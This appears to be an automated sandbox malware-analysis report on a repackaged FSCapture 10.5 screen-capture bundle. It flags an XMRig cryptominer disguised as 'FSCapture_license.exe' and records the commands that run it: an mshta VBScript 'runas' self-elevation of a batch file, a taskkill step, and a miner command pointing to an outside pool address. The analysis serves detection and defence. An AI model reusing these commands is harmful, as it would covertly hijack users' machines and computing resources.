Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCapture.exe"

Network

N/A

Files

memory/2244-0-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2244-1-0x0000000007370000-0x000000000738E000-memory.dmp

memory/2244-4-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2244-3-0x0000000000380000-0x0000000000A8F000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

137s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2536 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2736 wrote to memory of 2536 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2736 wrote to memory of 2536 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin01.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2536 -ip 2536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 660

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

154s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT","goto :target","","runas",1)(window.close)

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT" goto :target

C:\Windows\system32\taskkill.exe

taskkill /f /t /im FSCapture_license.exe

C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe

FSCapture_license.exe -o 104.168.101.23:34512 -t 7 -B -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 104.168.101.23:34512 tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.101.168.104.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/4456-2-0x0000000001080000-0x00000000010A0000-memory.dmp

memory/4456-3-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-4-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-5-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-6-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-7-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-8-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-9-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-10-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-11-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-12-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-13-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-14-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-15-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/4456-16-0x0000000000400000-0x0000000000E80000-memory.dmp